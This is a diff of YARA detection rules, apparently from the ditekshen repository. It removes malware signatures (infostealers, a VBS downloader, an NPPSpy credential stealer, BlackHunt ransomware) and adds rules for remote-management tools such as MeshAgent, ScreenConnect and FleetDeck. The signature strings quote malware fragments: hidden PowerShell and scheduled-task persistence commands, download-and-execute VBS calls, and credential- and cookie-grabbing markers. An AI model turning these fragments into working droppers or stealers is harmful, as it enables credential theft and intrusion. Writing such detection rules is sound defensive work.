-                64 00 3b 00 20 00 63 00 68 00 61 00 72 00 73 00
-                65 00 74 00 3d 00 75 00 74 00 66 00 2d 00 38 00
-                42 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74
-                00 69 00 6f 00 6e 00 2f 00 6a 00 73 00 6f 00 6e
-                00 2c 00 20 00 74 00 65 00 78 00 74 00 2f 00 70
-                00 6c 00 61 00 69 00 6e 00 2c 00 20 00 2a 00 2f
-                00 2a }
-		$s8 = /_(SET|GET)_(GRABBER|LOADER)/ wide
-		$s9 = /catch (save )?(windows cred|screen|pluginscrypto|historyCC|autofill|cookies|passwords|passwords sql|autofills sql|dwnlhistory sql|discordToken|quantum|isDropped)/ fullword wide
+		$s1 = "\\include\\xmemory" ascii wide
+		$s2 = "targetBrowser" ascii
+		$s3 = "thirdPattern" ascii
+		$s4 = "isBrowserWow64" ascii
+		$s5 = "wcscpy_s(memory, size_in_elements, string)" fullword wide
+		$s6 = "hChrome" fullword ascii
+		$t1 = "szCookieMonster" fullword ascii
+		$t2 = "szPasswordReuseDetectorInstances" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Graphicalproton_Rsockstun : FILE
+rule DITEKSHEN_INDICATOR_RMM_Meshagent : FILE
 {
 	meta:
-		description = "Detects GraphicalProton custom rsockstun"
-		author = "ditekShen"
-		id = "5efa85f6-7e73-53a1-92df-4cb975e62345"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11271-L11286"
+		description = "Detects MeshAgent. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "3d0baa87-22c9-569d-ba84-37ccaac577b8"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L3-L27"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca4d18160b89d82106310237cf81bba57a7f51be77a31d2f18ca8c2987972c2c"
+		logic_hash = "f36c0e23b20e4466100cf4ea2a91515bf1d54505e7b1f0926a4e416a04e0dbcf"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.MeshAgent"
 
 	strings:
-		$m1 = "main.connectviaproxy" ascii
-		$m2 = "main.connectForSocks" ascii
-		$m3 = "main.listenForClients" ascii
-		$m4 = "main.listenForSocks" ascii
-		$s1 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
-		$s2 = "Server: nginx/1.14.1" ascii
-		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" ascii
-		$s4 = "wine_get" ascii
+		$x1 = "\\MeshAgent" wide
+		$x2 = "Mesh Agent" wide
+		$x3 = "MeshDummy" wide
+		$x4 = "MeshCentral" wide
+		$x5 = "ILibRemoteLogging.c" ascii
+		$x6 = "AgentCore/MeshServer_" wide
+		$s1 = "var _tmp = 'Detected OS: ' + require('os').Name;" ascii
+		$s2 = "console.log(getSHA384FileHash(process.execPath).toString('hex'))" ascii
+		$s3 = "ScriptContainer.Create(): Error spawning child process, using [%s]" fullword ascii
+		$s4 = "{\"agent\":\"" ascii
+		$s6 = "process.versions.commitHash" fullword ascii
+		$s7 = "console.log('Error Initializing script from Zip file');process._exit();" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $m* ) and 2 of ( $s* ) ) or ( all of ( $s* ) and 1 of ( $m* ) ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
 }
 
-rule DITEKSHEN_MALWARE_Win_PWSHDLLDL : FILE
+rule DITEKSHEN_INDICATOR_RMM_Meshagent_CERT : FILE
 {
 	meta:
-		description = "Detects downloader"
-		author = "ditekShen"
-		id = "553ed216-c8c2-504f-b689-0e8d21a00eaa"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11288-L11303"
+		description = "Detects Mesh Agent by (default) certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "b4b52faa-53a5-5ecf-bff8-984994449ee0"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L29-L42"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7acef81f0e6e282650c161963599dcbe2b3975d482eb7c330581901b0fe85655"
+		logic_hash = "d8ac3aec723a87146be99aefbde5642d095d8d41f69c6f5e9981c39104790d33"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = "powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file " fullword wide nocase
-		$s2 = "objShell.run \"powershell -WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
-		$s3 = "cmd.exe /c schtasks.exe /create /tn \"" fullword wide nocase
-		$s4 = "-WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
-		$s6 = "\" /tr \"wscript.exe //b //nologo '" fullword wide nocase
-		$s7 = "\" -Value \"Powershell.exe -WindowStyle hidden \"\"& '" fullword wide nocase
-		$op0 = { 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 }
-		$op1 = { 4b 04 00 00 34 01 00 00 7f 05 00 00 1a }
-
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "MeshCentralRoot-" )
 }
-
-rule DITEKSHEN_MALWARE_Win_Nppspy : FILE
+rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect : FILE
 {
 	meta:
-		description = "Detects NPPSpy / Ntospy"
-		author = "ditekShen"
-		id = "3867ba96-1162-5693-b58e-fc6fa04d880a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11305-L11325"
+		description = "Detects ConnectWise Control (formerly ScreenConnect). Review RMM Inventory"
+		author = "ditekSHen"
+		id = "d752b7e4-b595-56cb-97f1-a60e73160e5a"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L62-L83"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53e929b52dddd5e3d060d2dd9937411f1ff215be4d3c67f5935c2a3fbab006d6"
+		logic_hash = "43003f97c33c631a2806ce2b82b2367d2452ceb21b0267b5dfe78b350b66924a"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.ConnectWise-ScreenConnect"
 
 	strings:
-		$s1 = "ntskrnl.dll" fullword ascii
-		$s2 = "PasswordStealing.dll" fullword ascii
-		$s3 = "ntoskrnl.dll" fullword ascii
-		$s4 = "\\programdata\\packag~" ascii
-		$s5 = "NPPSPY.dll" fullword ascii
-		$s6 = "MSControll.dll" fullword ascii
-		$s7 = "\\Windows\\Temp\\" ascii
-		$s8 = "\\NPPSpy\\" ascii
-		$s9 = "NPGetCaps" fullword ascii
-		$s10 = "NPLogonNotify" fullword ascii
-		$path = "\\GrzegorzTworek\\" ascii
+		$s1 = "FILESYSCREENCONNECT.CORE, VERSION=" wide
+		$s2 = "feedback.screenconnect.com/Feedback.axd" wide
+		$s3 = /ScreenConnect (Software|Client)/ wide
+		$s4 = "ScreenConnect.InstallerActions!ScreenConnect." wide
+		$s5 = "\\\\.\\Pipe\\TerminalServer\\SystemExecSrvr\\" wide
+		$s6 = "\\jmorgan\\Source\\cwcontrol\\Custom\\DotNetRunner\\" wide
+		$s7 = "ScreenConnect." ascii
+		$s8 = "\\ScreenConnect.Core.pdb" ascii
+		$s9 = "relay.screenconnect.com" ascii
+
+	condition:
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 3 of them
+}
+
+rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect_CERT : FILE
+{
+	meta:
+		description = "Detects ConnectWise Control (formerly ScreenConnect) by (default) certificate. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "7a032c24-8a9e-51c3-983e-62e13594aa35"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L85-L99"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "14291bd9ddb7fd3ee7932f8104687aae58fe7f5de13726153e5e1ee9c211f598"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( pe.is_dll ( ) and filesize < 110KB and pe.number_of_exports == 2 and ( ( pe.exports ( "NPGetCaps" ) and pe.exports ( "NPLogonNotify" ) ) or ( 1 of ( $s* ) and ( pe.exports ( "NPGetCaps" ) or pe.exports ( "NPLogonNotify" ) ) ) ) ) or ( ( $path ) and any of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Connectwise, LLC" )
 }
-rule DITEKSHEN_MALWARE_Win_Agentracoon : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Agent : FILE
 {
 	meta:
-		description = "Detects AgentRacoon. Not Raccoon"
-		author = "ditekShen"
-		id = "cc31bd71-da96-5a3d-b2f1-40f9745d8d46"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11327-L11343"
+		description = "Detects FleetDeck Agent. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "342a196c-1c5c-5951-85e4-d288311b4980"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L101-L123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7ed17a1bc161855f2bdc432952086f3b86b58ae9ea6c0d541544f4b63a8e08e8"
+		logic_hash = "121e59ea0088c519b618e740b57c560d60cced4a48c9d468e6bf1ab22fa8c8ff"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckAgent"
 
 	strings:
-		$s1 = "UdpClient" fullword ascii
-		$s2 = "IPEndPoint" fullword ascii
-		$s3 = "get_Client" fullword ascii
-		$s4 = "set_ReceiveTimeout" fullword ascii
-		$s5 = "Command failed:" wide
-		$s6 = "uploaded" wide
-		$s7 = "downloaded" wide
-		$s8 = ".telemetry." wide
-		$s9 = "xn--" wide
+		$s1 = "fleetdeck.io/" ascii
+		$s2 = "load FleetDeck agent" ascii
+		$s3 = ".dev1.fleetdeck.io" ascii
+		$s4 = "remoteDesktopSessionMutex" ascii
+		$s5 = "main.remoteDesktopWatchdog" fullword ascii
+		$s6 = "main.virtualTerminalWatchdog" fullword ascii
+		$s7 = "main.meetRemoteDesktop" fullword ascii
+		$s8 = "repo.senri.se/prototype3/" ascii
+		$s9 = "main.svcIpcClient" fullword ascii
+		$s10 = "main.hookMqttLogging" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Simda : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander : FILE
 {
 	meta:
-		description = "Detects Simda / Shifu infostealer"
-		author = "ditekShen"
-		id = "892a5ffe-ea1a-5df3-9c36-0198fa61b8b6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11345-L11361"
+		description = "Detects FleetDeck Commander. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "27d533b5-7a66-507e-8ef8-ad9a6cd39ab1"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L125-L143"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3f06e86033e8f9534f9904a2a63c4717a9532eb235f6f4405ef1db7d9b93f036"
+		logic_hash = "feee888c6649af0d8e8b08a38dda0bf7970089cf064f58b8bd9c6ebd8378e094"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander"
 
 	strings:
-		$s1 = "command=auth_loginByPassword&back_command=&back_custom1=&" fullword ascii
-		$s2 = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clma" ascii
-		$s3 = "debug_%s_%s.log" fullword ascii
-		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" ascii
-		$s5 = "name=%s&port=%u" ascii
-		$s6 = "id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d" ascii
-		$s7 = "{BotVer:" fullword ascii
-		$s8 = "software\\microsoft\\windows nt\\currentversion\\winlogon" ascii
-		$s9 = /(!|&|data_)inject(=ok)?/ fullword ascii
+		$s1 = "Software\\Microsoft\\FleetDeck Commander" ascii
+		$s2 = "fleetdeck.io/prototype3/" ascii
+		$s3 = "fleetdeck_commander_launcher.exe" ascii
+		$s4 = "fleetdeck_commander_svc.exe" ascii
+		$s5 = "|FleetDeck Commander" ascii
+		$s6 = "c:\\agent\\_work\\66\\s\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Vbsdownloader : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_SVC : FILE
 {
 	meta:
-		description = "Detects second stage VBS downloader of third stage VBS"
-		author = "ditekShen"
-		id = "480e6872-3a8c-58c5-a455-02342ec7918c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11363-L11375"
+		description = "Detects FleetDeck Commander SVC. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "c03b61b4-36d0-5d38-9af8-e78b9930231f"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L145-L162"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fee9a78e60d02ff2f03035812af2bf36fe350c70d3e4e094713791833f8ba4d6"
+		logic_hash = "20bd69df3d058c24f83af312671cf249a3f26f54ef2e60f6b5b48a5bdb21b68b"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-SVC"
 
 	strings:
-		$s1 = "CreateObject(\"MSXML2.ServerXMLHTTP\")" wide
-		$s2 = ".Open \"GET\"," wide
-		$s3 = ".Send" wide
-		$s4 = ".responseText" wide
-		$s5 = "ExecuteGlobal" wide
+		$s1 = "fleetdeckfork/execfuncargs(" ascii
+		$s2 = "REG ADD HKEY_CLASSES_ROOT\\%s /V \"URL Protocol\" /T REG_SZ /F" ascii
+		$s3 = "proceed: *.fleetdeck.io" ascii
+		$s4 = "fleetdeck.io/prototype3/commander_svc" ascii
+		$s5 = "commanderupdate.fleetdeck.io" ascii
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Umbralstealer : FILE
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_Launcher : FILE
 {
 	meta:
-		description = "Detects Umbral infostealer"
-		author = "ditekShen"
-		id = "695a350b-3d8e-5244-a275-a60202a8e956"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11377-L11398"
+		description = "Detects FleetDeck Commander Launcher. Review RMM Inventory"
+		author = "ditekSHen"
+		id = "9a4a221e-7a7a-5008-b509-7f01e4a3eea6"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L164-L178"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1686e4626e4d6335f028d6cb6471c32dac747a77fc95d97b4c9dfd043ba975e9"
+		logic_hash = "9429f55f162eebc58a7a9af8706244438cb76b1f0987facbb52d29997ed48b95"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-Launcher"
 
 	strings:
-		$x1 = "Umbral Stealer" wide
-		$x2 = "Umbral.payload." ascii
-		$s1 = "U2V0LU1wUHJlZmVyZW5jZ" wide
-		$s2 = "{{ Key = {0}, Value = {1} }}" wide
-		$s3 = "csproduct get uuid" wide
-		$s4 = "0.0.0.0 www."
-		$s5 = /(set|get)_Take(Screen|WebcamSnap)shot/ fullword ascii
-		$s6 = "still_pin" fullword ascii
-		$c1 = "kaspersky.com" wide
-		$c2 = "bitdefender.com" wide
-		$c3 = "virustotal.com" wide
-		$c4 = "malwarebytes.com" wide
-		$c5 = "clamav.net" wide
-		$c6 = "trendmicro.com" wide
+		$s1 = "fleetdeck.io/prototype3/commander_launcher" ascii
+		$s2 = "FleetDeck Commander Launcher" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 4 of ( $c* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Metastealer : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_CERT : FILE
 {
 	meta:
-		description = "Detects MetaStealer infostealer"
+		description = "Detects FleetDeck agent by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "46aa30c1-12c2-56df-8c65-0b96147f9051"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11400-L11423"
+		id = "49a6b0bb-599a-54b0-85bc-b2f6849e3ae8"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L180-L198"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "260c6d90a89ddb6219a5cbad18058e41611ae2dc68a8d4e589fa6ca81853752f"
+		logic_hash = "8f72713eb4a5d9d32629351b937eee7de5d83abe1cd409cd8c3a8c9c52e6e490"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = "! #\"'&(&*)>=@?POQOROSOTOUOVOWOXOYOZO[O^]{z|z}z~z" fullword wide
-		$s2 = "{0}{1}{2}" fullword wide
-		$s3 = "localhost" fullword wide
-		$s4 = "\\tdata" fullword wide
-		$s5 = "DecryptBlob" fullword ascii
-		$s6 = "GetMac" fullword ascii
-		$s7 = "GetHdc" fullword ascii
-		$s8 = "FindProc" fullword ascii
-		$s9 = "targetPid" fullword ascii
-		$s10 = "MessageSecurityOverTcp" fullword ascii
-		$s11 = "ListOfProcesses" fullword ascii
-		$s12 = "ListOfPrograms" fullword ascii
-		$s13 = "browserPaths" fullword ascii
-		$s14 = "configs" fullword ascii
-		$s15 = "scanners" fullword ascii
-		$s16 = "FileScannerRule" fullword ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( ( pe.signatures [ i ] . issuer contains "Sectigo Limited" or pe.signatures [ i ] . issuer contains "COMODO CA Limited" ) and pe.signatures [ i ] . subject contains "FleetDeck Inc" )
 }
-
-rule DITEKSHEN_MALWARE_Win_Mediapi : FILE
+rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent : FILE
 {
 	meta:
-		description = "Detects MediaPI"
+		description = "Detects PDQ Connect Agent. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "95db8772-1bcd-5eea-956c-c9578b8e1329"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11425-L11439"
+		id = "067e75a3-291b-500f-865d-8758eebe91e7"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L200-L227"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2bce0a96b45e46c0cbd913dacb3dfe7ae1b519102d637e0fd9dabe2008037d94"
+		logic_hash = "34d0b07925551d1b08b86aa226c59aba569b6548cfa00a86ce6b1f271e427662"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "SomeFunction" ascii
-		$s2 = "\"stealth" ascii
-		$s3 = "\"ServAddr" ascii
-		$s4 = "\"ServPort" ascii
-		$s5 = "\"ServIp" ascii
-		$s6 = "\"wsaData" ascii
-		$s7 = "\"-socket" ascii
+		$api1 = "/devices/register" ascii
+		$api2 = "/devices/socket/websocket?device_id=" ascii
+		$api3 = "/devices/tasks" ascii
+		$api4 = "/devices/auth-challenge" ascii
+		$api5 = "/devices/receiver/Url" ascii
+		$s1 = "sign_pdq.rs" ascii
+		$s2 = "x-pdq-dateCredential=(.+?)/" ascii
+		$s3 = "pdq-connect-agent" ascii
+		$s4 = "PDQ Connect Agent" ascii
+		$s5 = "PDQConnectAgent" ascii
+		$s6 = "PDQConnectAgentsrc\\logger.rs" ascii
+		$s7 = "-PDQ-Key-IdsUser-Agent" ascii
+		$s8 = "\\PDQ\\PDQConnectAgent\\" ascii
+		$s9 = "\\pdq_connect_agent.pdb" ascii
+		$s10 = "task_ids[]PDQ rover" ascii
+		$s11 = "https://app.pdq.com/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( ( 6 of them ) or ( 3 of them and pe.exports ( "SomeFunction" ) ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and ( 4 of ( $s* ) or ( 3 of ( $api* ) and 1 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Blackhunt : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent_CERT : FILE
 {
 	meta:
-		description = "Detects BlackHunt ransomware"
+		description = "Detects PDQ Connect Agent by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "4bdb26dd-a424-54a6-b313-e98bdf18cfce"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11441-L11456"
+		id = "7e830cf0-8f47-5b38-85cd-9777a6878cf1"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L229-L243"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62e9bc505eff3e19ff0cdaf180e45e6d7917f0bec7cd9b007bee9fe1d9d09b66"
+		logic_hash = "373a32b8bfd8c4295ba0c0302a217ccfbb7c7c616f91035097adbc5384b8afdb"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = /#BlackHunt_(Logs|BG|Icon|Public|Private|ID|ReadMe|Update)\.(txt|jpg|ico|key|hta)/ ascii wide
-		$s2 = /-(biggame|noencrypt|netinfo|nospread)/ fullword wide
-		$s3 = "/v \"*BlackHunt\" /t REG_SZ /d" wide
-		$s4 = "/sc onstart /TN \"Windows Critical Update\" /TR \"'%s' %s\" /F" wide
-		$s5 = "/v \"DisableChangePassword\" /t REG_DWORD /d" wide
-		$s6 = "<span> %s </span>this ID (<span> %s </span>)" wide
-		$s7 = "}div.header h1 span#hunter" wide
-		$s8 = "BLACK_HUNT_MUTEX" fullword ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "PDQ.com Corporation" )
 }
-
-rule DITEKSHEN_MALWARE_Win_Scoutelite : FILE
+rule DITEKSHEN_INDICATOR_RMM_Pulseway_Pcmontasksrv : FILE
 {
 	meta:
-		description = "Detects ScoutElite"
+		description = "Detects Pulseway pcmontask and service user agent responsible for Remote Control, Screens View, Computer Lock, etc"
 		author = "ditekSHen"
-		id = "989f558b-f84c-5f64-b85d-618d83f96782"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/back-in-2017"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11458-L11531"
+		id = "83901679-ffff-5710-b472-ece592e6764f"
+		date = "2023-08-22"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L245-L266"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "935bd891a9b68cb6ddad86db843de624f3a7ec0824f2b4c6ff0da56422b79668"
+		logic_hash = "80ba217960dd1ddeb220545c1cccbe96d9b676d327364e1ca8a9dde2b059261f"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.PulseWay"
 
